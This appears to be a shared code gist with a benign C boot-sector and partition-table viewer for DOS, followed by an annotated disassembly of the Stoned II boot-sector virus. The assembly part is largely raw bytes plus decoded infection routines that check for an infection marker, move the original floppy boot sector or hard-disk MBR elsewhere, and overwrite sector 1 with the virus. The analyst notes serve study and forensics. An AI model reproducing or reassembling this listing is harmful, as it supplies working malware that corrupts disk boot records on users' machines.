Created
January 4, 2012 19:33
#TJHSST ~ Stoned II
/* analyze the FAT */ | |
#include <stdio.h> | |
#include <dos.h> | |
#include <ctype.h> | |
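/* DOS directory-entry attribute bits (tested against direntry.attr). */
#define ReadOnly  0x01
#define Hidden    0x02
#define System    0x04
#define Volume    0x08
#define Directory 0x10
#define Archive   0x20

/* Highest drive number readboot() will accept (0 = A:). */
#define MaxDrive 2

/*
 * The structures below are overlaid directly on raw sector data.
 * They add up to the on-disk sizes (32-byte directory entry, 16-byte
 * partition entry, 512-byte boot sector) only when `word` is 16 bits,
 * `longint` is 32 bits and the compiler inserts no padding, i.e. a
 * 16-bit DOS compiler with byte alignment.  On any other target the
 * field offsets are wrong and a one-sector read no longer fits the
 * struct exactly.
 */
typedef unsigned int word;
typedef unsigned char byte;
typedef unsigned long int longint;

/* Packed time-of-day field of a directory entry (16 bits in total). */
typedef struct {
    unsigned seconds : 5;
    unsigned minutes : 6;
    unsigned hours   : 5;
} timetype;

/* Packed date field of a directory entry (16 bits in total). */
typedef struct {
    unsigned day   : 5;
    unsigned month : 4;
    unsigned year  : 7;
} datetype;

/* One directory entry; declared here but not used elsewhere in this file. */
typedef struct {
    byte name[8], ext[3], attr, reserved[10];
    timetype time;
    datetype date;
    word start;     /* first cluster */
    longint size;   /* file size in bytes */
} direntry;

/*
 * One partition-table entry.  startsc[]/endsc[] hold the packed
 * sector/cylinder pair: byte 0 carries the sector in its low six bits and
 * the two high cylinder bits in its top two bits, byte 1 carries the low
 * eight cylinder bits.
 */
typedef struct {
    byte status, starthead, startsc[2], type, endhead, endsc[2];
    longint startabsolute, numbersectors;
} partitiontable;

/*
 * Boot sector image.  With the 16-bit layout described above, `partition`
 * sits at byte offset 446 (1BEh) and the structure is 512 bytes long.
 */
typedef struct {
    byte jump[3], oemname[8];
    word bytesector;
    byte sectorcluster;
    word reservedsectors;
    byte fattables;
    word direntries, logicalsectors;
    byte media;
    word fatsectors, sectorstrack, heads, hiddensectors;
    byte bootcode[416];
    partitiontable partition;
    byte bootcode1[50];   /* was "bytebootcode1[50]": type and name had run together */
} bootsector;

int readboot(int, bootsector *);
int dispboot(bootsector);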
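/*
 * Read the boot sector of drive 0 (A:) and print its decoded fields.
 *
 * Returns 0 on success, 1 when the sector could not be read.
 */
int main(void)
{
    bootsector boot;

    /*
     * Decode the buffer only after a successful read.  On failure `boot`
     * is uninitialised stack memory, and dumping it would present garbage
     * as if it were disk contents.
     */
    if (readboot(0, &boot) != 0) {
        fprintf(stderr, "cannot read boot sector of drive 0\n");
        return 1;
    }
    dispboot(boot);
    return 0;
}

/*
 * Read logical sector 0 of a drive into *bootptr.
 *
 * drive   - drive number, 0..MaxDrive
 * bootptr - destination buffer; must not be NULL
 *
 * Returns -1 when drive is out of range or bootptr is NULL, otherwise the
 * status from absread() (presumably 0 on success and -1 on error, as in
 * the Turbo C <dos.h> convention -- confirm for the compiler in use).
 * The original fell off the end of the function on the read path, so the
 * caller had no defined result to test.
 *
 * NOTE(review): absread() is asked for one whole sector and has no idea
 * how large *bootptr is.  The read fits only when sizeof(bootsector)
 * equals the sector size; see the layout comment on the typedefs.
 */
int readboot(int drive, bootsector *bootptr)
{
    if (drive < 0 || drive > MaxDrive || bootptr == NULL)
        return -1;
    return absread(drive, 1, 0, bootptr);
}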
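/*
 * Print a human-readable dump of a boot sector / master boot record.
 *
 * boot - sector image, passed by value.
 *
 * Returns 0.
 *
 * Every field printed here was read from the disk and is not trusted:
 * counts are printed as unsigned so large values do not show up negative,
 * and the OEM name is filtered so that control or escape bytes stored on
 * a crafted disk never reach the terminal.
 */
int dispboot(bootsector boot)
{
    int cnt;

    printf("jmp code : ");
    for (cnt = 0; cnt < 3; cnt++)
        printf("%02X ", (unsigned)boot.jump[cnt]);
    printf("\n");

    printf("oem name : ");
    for (cnt = 0; cnt < 8; cnt++) {
        /* byte is unsigned char, so the value is already in isprint()'s domain */
        int ch = boot.oemname[cnt];
        printf("%c", isprint(ch) ? ch : '.');
    }
    printf("\n");

    switch (boot.media) {
    case 0xf0:
        printf("3.5in 1.44 Mbyte floppy\n");
        break;
    case 0xf9:
        printf("5.25in 1.2MByte or 3.5in 720K floppy\n");
        break;
    case 0xfd:
        printf("5.25in 360K\n");
        break;
    default:    /* was misspelt "defalut", which made it an unreachable label */
        printf("unknown format\n");
        break;
    }

    printf("%10u bytes per sector\n", boot.bytesector);
    printf("%10u sectors per cluster\n", (unsigned)boot.sectorcluster);
    printf("%10u reserved sectors\n", boot.reservedsectors);
    printf("%10u FAT tables\n", (unsigned)boot.fattables);
    printf("%10u directory entries\n", boot.direntries);
    printf("%10u logical sectors\n", boot.logicalsectors);
    printf("%10u FAT sectors\n", boot.fatsectors);
    printf("%10u sectors per track\n", boot.sectorstrack);
    printf("%10u heads\n", boot.heads);
    printf("%10u hidden sectors\n", boot.hiddensectors);

    switch (boot.partition.status) {
    case 0:
        printf("inactive\n");
        break;
    case 0x80:
        printf("active, bootable\n");
        break;
    default:
        /* any other status byte: the table is not decoded below */
        break;
    }

    if (boot.partition.status == 0 || boot.partition.status == 0x80) {
        printf("disk partition table\n");
        printf("%10u starting head\n", (unsigned)boot.partition.starthead);
        /* the sector number is the low six bits; the old 0x30 mask dropped bits 0-3 */
        printf("%10u starting sector\n",
               (unsigned)(boot.partition.startsc[0] & 0x3f));
        /* cylinder = low eight bits from byte 1, bits 8-9 from the top of byte 0 */
        printf("%10u starting cyclinder\n",
               (unsigned)boot.partition.startsc[1] |
               ((unsigned)(boot.partition.startsc[0] & 0xc0) << 2));

        switch (boot.partition.type) {
        case 1:
            printf("12 bit FAT\n");
            break;
        case 4:
            printf("16 bit FAT\n");
            break;
        case 5:
            printf("Extended DOS\n");
            break;
        default:
            printf("unknown partition type\n");
            break;
        }

        printf("%10u ending head\n", (unsigned)boot.partition.endhead);
        printf("%10u ending sector\n",
               (unsigned)(boot.partition.endsc[0] & 0x3f));
        printf("%10u ending cyclinder\n",
               (unsigned)boot.partition.endsc[1] |
               ((unsigned)(boot.partition.endsc[0] & 0xc0) << 2));
        printf("%10lu absolute starting sector\n", boot.partition.startabsolute);
        printf("%10lu sectors long\n", boot.partition.numbersectors);
    }
    return 0;
}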
PAGE 60,132 | |
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ | |
;ÛÛ ÛÛ | |
;ÛÛ STONED2 ÛÛ | |
;ÛÛ ÛÛ | |
;ÛÛ Created: 1-Jan-80 ÛÛ | |
;ÛÛ ÛÛ | |
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ | |
; Analyst notes (added in review).  This is automatic disassembler output
; for a boot-sector program labelled STONED2.  Only some byte runs were
; decoded into instructions; the DB tables are left as raw bytes, so the
; way control reaches each labelled fragment cannot be read from this
; listing alone.  The per-line comments after the instructions are the
; disassembler's own.
;
; DATA_1E/2E/3E are offsets into the code segment used as variables:
; DATA_1E is a byte written with 0 or 2 below, DATA_2E and DATA_3E are
; DWORD far pointers used as CALL / JMP targets.
DATA_1E EQU 8 ; (694B:0008=0) | |
DATA_2E EQU 9 ; (694B:0009=0) | |
DATA_3E EQU 11H ; (694B:0011=0) | |
CODE_SEG_A SEGMENT | |
ASSUME CS:CODE_SEG_A, DS:CODE_SEG_A | |
ORG 100h | |
stoned2 PROC FAR | |
start: | |
; 100h + 31488 (7B00h) = 7C00h, so the bytes after this padding sit at
; offset 7C00h of the image.
; NOTE(review): 7C00h is the address a PC BIOS loads a boot sector to --
; presumably why the disassembler padded the image this way; confirm.
DB 31488 DUP (0) | |
; The first four bytes below (0EAH, 5, 0, 0C0H) are the two words that
; LOC_2 and LOC_6 compare against a sector read from disk; they are the
; sample's "already present" marker and therefore usable as a signature.
DB 0EAH, 5, 0, 0C0H, 7, 0E9H | |
DB 99H, 0, 0, 11H, 99H, 0 | |
DB 0F0H, 0E4H, 0, 80H, 9FH, 0 | |
DB 7CH, 0, 0, 1EH, 50H, 80H | |
DB 0FCH, 2, 72H, 17H, 80H, 0FCH | |
DB 4, 73H, 12H, 0AH, 0D2H, 75H | |
DB 0EH, 33H, 0C0H, 8EH, 0D8H, 0A0H | |
DB 3FH, 4, 0A8H, 1, 75H, 3 | |
DB 0E8H, 7, 0, 58H, 1FH, 2EH | |
DB 0FFH, 2EH, 9, 0, 53H, 51H | |
DB 52H, 6, 56H, 57H, 0BEH, 4 | |
DB 0 | |
; LOC_1: read one sector (AX=0201h) from cylinder 0, head 0, sector 1 of
; drive DL=0 into CS:0200h.  The disk service is reached by PUSHF + far
; CALL through the pointer at CS:DATA_2E, which imitates an INT.
; NOTE(review): presumably that pointer holds the saved original INT 13h
; vector; it is filled in by the undecoded bytes -- confirm.
; On failure AX=0 is passed to the same service (disk reset), SI is
; decremented and the read is retried; SI's start value is set outside the
; decoded instructions.
LOC_1: | |
MOV AX,201H | |
PUSH CS | |
POP ES | |
MOV BX,200H | |
XOR CX,CX ; Zero register | |
MOV DX,CX | |
INC CX | |
PUSHF ; Push flags | |
CALL DWORD PTR CS:DATA_2E ; (694B:0009=0) | |
JNC LOC_2 ; Jump if carry=0 | |
XOR AX,AX ; Zero register | |
PUSHF ; Push flags | |
CALL DWORD PTR CS:DATA_2E ; (694B:0009=0) | |
DEC SI | |
JNZ LOC_1 ; Jump if not zero | |
JMP SHORT LOC_4 | |
DB 90H | |
; LOC_2: compare the words at CS:0000 and CS:0002 (this code's own first
; four bytes) with the first four bytes of the sector just read at
; CS:0200h.  If both match, nothing is written and control goes to LOC_4.
LOC_2: | |
XOR SI,SI ; Zero register | |
MOV DI,200H | |
CLD ; Clear direction | |
PUSH CS | |
POP DS | |
LODSW ; String [si] to ax | |
CMP AX,[DI] | |
JNE LOC_3 ; Jump if not equal | |
LODSW ; String [si] to ax | |
CMP AX,[DI+2] | |
JE LOC_4 ; Jump if equal | |
; LOC_3: two one-sector writes (AX=0301h) to drive 0, assuming the disk
; service preserved CX/DX/ES from LOC_1:
;   1. the sector previously read (CS:0200h) -> cylinder 0, head 1, sector 3
;   2. this code (ES:0000)                    -> cylinder 0, head 0, sector 1
; Forensics: on an affected diskette the displaced original boot sector is
; therefore expected at C0/H1/S3.
LOC_3: | |
MOV AX,301H | |
MOV BX,200H | |
MOV CL,3 | |
MOV DH,1 | |
PUSHF ; Push flags | |
CALL DWORD PTR CS:DATA_2E ; (694B:0009=0) | |
JC LOC_4 ; Jump if carry Set | |
MOV AX,301H | |
XOR BX,BX ; Zero register | |
MOV CL,1 | |
XOR DX,DX ; Zero register | |
PUSHF ; Push flags | |
CALL DWORD PTR CS:DATA_2E ; (694B:0009=0) | |
; LOC_4: common exit; restores six registers and returns.
; NOTE(review): the matching pushes are not among the decoded
; instructions -- presumably in the DB bytes before LOC_1; confirm.
LOC_4: | |
POP DI | |
POP SI | |
POP ES | |
POP DX | |
POP CX | |
POP BX | |
RET | |
DB 33H, 0C0H, 8EH, 0D8H, 0FAH, 8EH | |
DB 0D0H, 0BCH, 0, 7CH, 0FBH, 0A1H | |
DB 4CH, 0, 0A3H, 9, 7CH, 0A1H | |
DB 4EH, 0, 0A3H, 0BH, 7CH, 0A1H | |
DB 13H, 4, 48H, 48H, 0A3H, 13H | |
DB 4, 0B1H, 6, 0D3H, 0E0H, 8EH | |
DB 0C0H, 0A3H, 0FH, 7CH, 0B8H, 15H | |
DB 0, 0A3H, 4CH, 0, 8CH, 6 | |
DB 4EH, 0, 0B9H, 0B8H, 1, 0EH | |
DB 1FH, 33H, 0F6H, 8BH, 0FEH, 0FCH | |
DB 0F3H, 0A4H, 2EH, 0FFH, 2EH, 0DH | |
DB 0, 0B8H, 0, 0, 0CDH, 13H | |
DB 33H, 0C0H, 8EH, 0C0H, 0B8H, 1 | |
DB 2, 0BBH, 0, 7CH, 2EH, 80H | |
DB 3EH, 8, 0, 0, 74H, 0BH | |
DB 0B9H, 7, 0, 0BAH, 80H, 0 | |
DB 0CDH, 13H, 0EBH, 49H, 90H, 0B9H | |
DB 3, 0, 0BAH, 0, 1, 0CDH | |
DB 13H, 72H, 3EH, 26H, 0F6H, 6 | |
DB 6CH, 4, 7, 75H, 12H, 0BEH | |
DB 89H, 1, 0EH, 1FH | |
; LOC_5: print the NUL-terminated string at DS:SI one character at a time
; with the BIOS teletype call (INT 10h, AH=0Eh).  SI is loaded outside the
; decoded instructions.
LOC_5: | |
LODSB ; String [si] to al | |
OR AL,AL ; Zero ? | |
JZ LOC_6 ; Jump if zero | |
MOV AH,0EH | |
MOV BH,0 | |
INT 10H ; Video display ah=functn 0Eh | |
; write char al, teletype mode | |
JMP SHORT LOC_5 | |
; LOC_6: read one sector (AX=0201h) into CS:0200h with CL=1 and DX=0080h
; (DH=0, DL=80h), then run the same four-byte marker comparison as LOC_2.
; NOTE(review): the generated comment below says "drive a:", but DL is 80h
; here; in the INT 13h convention 80h is the first fixed disk.  CH is not
; set by the decoded instructions.
LOC_6: | |
PUSH CS | |
POP ES | |
MOV AX,201H | |
MOV BX,200H | |
MOV CL,1 | |
MOV DX,80H | |
INT 13H ; Disk dl=drive a: ah=func 02h | |
; read sectors to memory es:bx | |
JC LOC_7 ; Jump if carry Set | |
PUSH CS | |
POP DS | |
MOV SI,200H | |
MOV DI,0 | |
LODSW ; String [si] to ax | |
CMP AX,[DI] | |
JNE LOC_8 ; Jump if not equal | |
LODSW ; String [si] to ax | |
CMP AX,[DI+2] | |
JNE LOC_8 ; Jump if not equal | |
; LOC_7: store 0 in the byte at CS:DATA_1E and continue through the far
; pointer at CS:DATA_3E.  Reached on a read/write error, when the marker
; already matched, or after LOC_8 has finished.
LOC_7: | |
MOV BYTE PTR CS:DATA_1E,0 ; (694B:0008=0) | |
JMP DWORD PTR CS:DATA_3E ; (694B:0011=0) | |
; LOC_8: store 2 in the byte at CS:DATA_1E, then with DL=80h:
;   1. write the sector previously read (CS:0200h) to cylinder 0, head 0,
;      sector 7 (CX=7, DH=0);
;   2. copy 242h bytes from CS:03BEh to CS:01BEh, i.e. from offset 1BEh of
;      the sector just read onto the same offset of this code's own copy
;      (1BEh is where the C structure in the first file places the
;      partition entry);
;   3. write this code (ES:0000) to sector 1.  CX is 0 after REP MOVSB, so
;      INC CL gives CX=1; DX is assumed unchanged by the first INT 13h.
; NOTE(review): the REP MOVSB relies on the direction flag being clear,
; which is not set in this fragment.
; Forensics: on an affected fixed disk the displaced original sector is
; therefore expected at C0/H0/S7.
LOC_8: | |
MOV BYTE PTR CS:DATA_1E,2 ; (694B:0008=0) | |
MOV AX,301H | |
MOV BX,200H | |
MOV CX,7 | |
MOV DX,80H | |
INT 13H ; Disk dl=drive a: ah=func 03h | |
; write sectors from mem es:bx | |
JC LOC_7 ; Jump if carry Set | |
PUSH CS | |
POP DS | |
PUSH CS | |
POP ES | |
MOV SI,3BEH | |
MOV DI,1BEH | |
MOV CX,242H | |
REP MOVSB ; Rep while cx>0 Mov [si] to es:[di] | |
MOV AX,301H | |
XOR BX,BX ; Zero register | |
INC CL | |
INT 13H ; Disk dl=drive a: ah=func 03h | |
; write sectors from mem es:bx | |
JMP SHORT LOC_7 | |
; A single 07h followed by 35 zero bytes.
; NOTE(review): if this is the string LOC_5 prints, only a BEL would be
; emitted before the terminator; confirm against the SI value loaded in
; the undecoded bytes.
DB 7 | |
DB 35 DUP (0) | |
DB 67H, 2, 6, 67H, 2, 67H | |
DB 2, 0BH, 3, 67H, 2 | |
stoned2 ENDP | |
CODE_SEG_A ENDS | |
END START |
http://en.wikipedia.org/wiki/Stoned_%28computer_virus%29